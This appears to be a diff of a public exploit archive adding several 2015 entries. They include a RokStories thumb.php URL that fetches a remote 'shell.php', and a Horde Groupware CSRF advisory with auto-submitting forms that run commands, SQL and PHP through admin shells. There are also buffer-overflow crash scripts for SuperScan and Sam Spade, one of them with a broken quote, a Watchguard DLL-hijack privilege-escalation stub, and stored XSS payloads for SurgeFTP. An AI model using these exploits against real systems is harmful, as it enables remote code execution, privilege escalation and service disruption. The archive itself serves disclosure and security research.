http://www.example.com/wp-content/plugins/wp_rokstories/thumb.php?src=http://www.example.com/big_file&h=1&w=1
http://www.example.com/wp-content/plugins/wp_rokstories/thumb.php?src=http://www.example2.com/shell.php

90
platforms/php/webapps/38765.txt Executable file
View file

@ -0,0 +1,90 @@
Advisory ID: HTB23272
Product: Horde Groupware
Vendor: http://www.horde.org
Vulnerable Version(s): 5.2.10 and probably prior
Tested Version: 5.2.10
Advisory Publication: September 30, 2015 [without technical details]
Vendor Notification: September 30, 2015
Vendor Patch: October 22, 2015
Public Disclosure: November 18, 2015
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2015-7984
Risk Level: High
CVSSv3 Base Score: 8.3 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered three Cross-Site Request Forgery (CSRF) vulnerabilities in a popular collaboration suite Horde Groupware, used by a variety of companies around the world. These vulnerabilities are very dangerous, since they can be used in targeted attacks against corporate clients. An attacker might be able to gain unauthorized access to information, stored in database, execute arbitrary commands on the server, compromise the entire application and perform attacks against application users and companys infrastructure.
1) Cross-Site Request Forgery in Horde Groupware: CVE-2015-7984
1.1 The vulnerability exists due to failure in the "/admin/cmdshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary system commands on the server.
CSRF exploit below sends HTTP POST request to vulnerable script and instructs it to display output of "/bin/ls" command. As a result, you will see contents of "/admin/" directory:
<form action="http://[host]/admin/cmdshell.php" method="post" name="main">
<input type="hidden" name="cmd" value="ls">
<input value="submit" id="btn" type="submit" />
</form>
<script>
document.getElementById('btn').click();
</script>
1.2 The vulnerability exists due to failure in the "/admin/sqlshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary SQL queries with applications database.
The exploit code below executes "SELECT version()" query and displays version of current MySQL server:
<form action="http://[host]/admin/sqlshell.php" method="post" name="main">
<input type="hidden" name="sql" value="SELECT version()">
<input value="submit" id="btn" type="submit" />
</form>
<script>
document.getElementById('btn').click();
</script>
1.3 The vulnerability exists due to failure in the "/admin/phpshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary php code on the server.
The exploit code below executes the "phpinfo()" function and displays its output:
<form action="http://[host]/admin/phpshell.php" method="post" name="main">
<input type="hidden" name="app" value="horde">
<input type="hidden" name="php" value="phpinfo();">
<input value="submit" id="btn" type="submit" />
</form>
<script>
document.getElementById('btn').click();
</script>
-----------------------------------------------------------------------------------------------
Solution:
Update to Horde Groupware 5.2.11
More Information:
http://lists.horde.org/archives/announce/2015/001137.html
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23272 - https://www.htbridge.com/advisory/HTB23272 - Multiple CSRF Vulnerabilities in Horde Groupware.
[2] Horde Groupware - http://www.horde.org - Horde Groupware is a free, enterprise ready, browser based collaboration suite.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

25
platforms/windows/dos/38758.py Executable file
View file

@ -0,0 +1,25 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title     : SuperScan 4.1 Scan Hostname/IP Field Buffer Overflow Crash PoC
# Discovery by      : Luis Martínez
# Email : l4m5@hotmail.com
# Discovery Date    : 18/11/2015
# Vendor Homepage   : http://www.foundstone.com
# Software Link     : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
# Tested Version    : 4.1
# Vulnerability Type    : Denial of Service (DoS) Local
# Tested on OS      : Windows XP Professional SP3 x86 es
# Steps to Produce the Crash:
# 1.- Run python code : python super_scan_4.1.py
# 2.- Open super_scan_4.1.txt and copy content to clipboard
# 3.- Open SuperScan4.1.exe
# 4.- Paste Clipboard Scan > Hostname/IP
# 5.- Clic on add button (->)
# 6.- Crashed
buffer = "\x41" * 636
eip = "\x42" * 4
f = open ("super_scan_4.1.txt", "w")
f.write(buffer + eip)
f.close()

25
platforms/windows/dos/38759.py Executable file
View file

@ -0,0 +1,25 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title     : SuperScan 4.1 Tools Hostname/IP/URL Field Buffer Overflow Crash PoC
# Discovery by      : Luis Martínez
# Email : l4m5@hotmail.com
# Discovery Date    : 18/11/2015
# Vendor Homepage   : http://www.foundstone.com
# Software Link     : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
# Tested Version    : 4.1
# Vulnerability Type    : Denial of Service (DoS) Local
# Tested on OS      : Windows XP Professional SP3 x86 es
# Steps to Produce the Crash:
# 1.- Run python code : python super_scan_4.1_tools.py
# 2.- Open super_scan_4.1_tools.txt and copy content to clipboard
# 3.- Open SuperScan4.1.exe
# 4.- Paste Clipboard Tools > Hostname/IP/URL
# 5.- Clic on button -> Whois
# 6.- Crashed
buffer = "\x41" * 280
eip = "\x42" * 4
f = open ("super_scan_4.1_tools.txt", "w")
f.write(buffer + eip)
f.close()

53
platforms/windows/dos/38760.py Executable file
View file

@ -0,0 +1,53 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title     : SuperScan 4.1 Windows Enumeration Hostname/IP/URL Field SEH Overflow Crash PoC
# Discovery by      : Luis Martínez
# Email : l4m5@hotmail.com
# Discovery Date    : 18/11/2015
# Vendor Homepage   : http://www.foundstone.com
# Software Link     : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
# Tested Version    : 4.1
# Vulnerability Type    : Denial of Service (DoS) Local
# Tested on OS      : Windows XP Professional SP3 x86 es
# Steps to Produce the Crash:
# 1.- Run python code : python super_scan_4.1_windows_enumeration.py
# 2.- Open super_scan_4.1_windows_enumeration.txt and copy content to clipboard
# 3.- Open SuperScan4.1.exe
# 4.- Paste Clipboard Windows Enumeration > Hostname/IP/URL
# 5.- Clic on button -> Enumerate
# 6.- Crashed
##########################################################################################
# -----------------------------------NOTES----------------------------------------------#
##########################################################################################
# After the execution of POC, the SEH chain looks like this:
# 00E3FF98 43434343
# 42424242 *** CORRUPT ENTRY ***
# And the Stack
#00E3FF88 41414141 AAAA
#00E3FF8C 41414141 AAAA
#00E3FF90 41414141 AAAA
#00E3FF94 41414141 AAAA
#00E3FF98 42424242 BBBB Pointer to next SEH record
#00E3FF9C 43434343 CCCC SE handler
# And the Registers
#EAX 00000001
#ECX 00000001
#EDX 7C91E514 ntdll.KiFastSystemCallRet
#EBX 00A028E8
#ESP 00E3FF58 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC"
#EBP 41414141
#ESI 00473774 SuperSca.00473774
#EDI 00000000
#EIP 41414141
buffer = "\x41" * 328
nseh = "\x42" * 4
seh = "\x43" * 4
f = open ("super_scan_4.1_windows_enumeration.txt", "w")
f.write(buffer + nseh + seh)
f.close()

22
platforms/windows/dos/38761.py Executable file
View file

@ -0,0 +1,22 @@
#!/usr/bin/env python
# Exploit Title : Sam Spade 1.14 Decode URL Buffer Overflow Crash PoC
# Discovery by : Vivek Mahajan - c3p70r
# Discovery Date : 19/11/2015
# Vendor Homepage : http://samspade.org
# Software Link : http://www.majorgeeks.com/files/details/sam_spade.html
# Tested Version : 1.14
# Vulnerability Type: Denial of Service / Proof Of Concept/ Memory Overwrite
# Tested On : Windows XP SP2 ,Windows 7 SP1 x64, Windows 8.1 x64 PRO, Windows 10 x64
# Crash Point : Go to Tools > Decode URL> Enter the contents of 'spade.txt' > OK , Note: Do Remove the http://
buffer = "A"*510
file = open("spade.txt, 'w')
file.write(buffer)
file.close()
# Follow on twitter @vik.create

26
platforms/windows/local/38752.c Executable file
View file

@ -0,0 +1,26 @@
source: http://www.securityfocus.com/bid/62261/info
Watchguard Server Center is prone to a local privilege-escalation vulnerability.
Local attackers can exploit this issue to gain SYSTEM privileges. Successful exploits will result in the complete compromise of affected computers.
Watchguard Server Center 11.7.4 and 11.7.3 are vulnerable; other versions may also be affected.
#include <windows.h>
#define DLL_EXPORT __declspec(dllexport)
#ifdef __cplusplus
extern "C"
{
#endif
void DLL_EXPORT wgpr_library_get()
{
WinExec("calc",0);
}
#ifdef __cplusplus
}
#endif

View file

@ -0,0 +1,33 @@
********************************************************************************************
# Exploit Netwin SurgeFTP Sever Stored Cross Site Scripting Vulnerabilities
# Date: 11/18/2015
# Exploit Author: Un_N0n
# Vendor: NetWin
# Software Link: http://netwinsite.com/cgi-bin/keycgi.exe?cmd=download&product=surgeftp
# Version: 23d6
# Tested on: Windows 7 x64(64bit)
********************************************************************************************
[Info]
Surgeftp web-interface suffers with multiple Stored XSS vulnerabilities.
They are:
Stored XSS in 'Domain Name' field.
[How to?]
1. Open SurgeFTP web interface, Click on global option from the menu.
2. Add a new domain, in 'Domain Name' field, add in this(<img src=x onmouseover=alert(1)>) payload.
3. Save, then navigate to main page, hover mouse over 'broken image' in 'domains' section.
Stored XSS in 'Mirrors'.
[How to?]
1. Open surgeftp web interface, Click on 'Mirrors' option from the menu.
2. Click on Add Mirror, in 'Local path' & 'Remote Host' field add in this(<img src=x onmouseover=alert(1)>) payload.
3. Save, then navigate to 'Mirror' page again, Hover mouse over the 'broken image' in 'local path' & 'remote host' field.
Previously, Somebody else reported Stored XSS vulnerabilities in SurgeFTP.
Vendor tried to fix the previously reported XSS vulnerabilities by blacklisting only the <script>alert('blah')</script> payload
which is well not a good practice since i have triggered the same vulnerability by just entering different XSS payload,
therefore White-listing is the correct solution.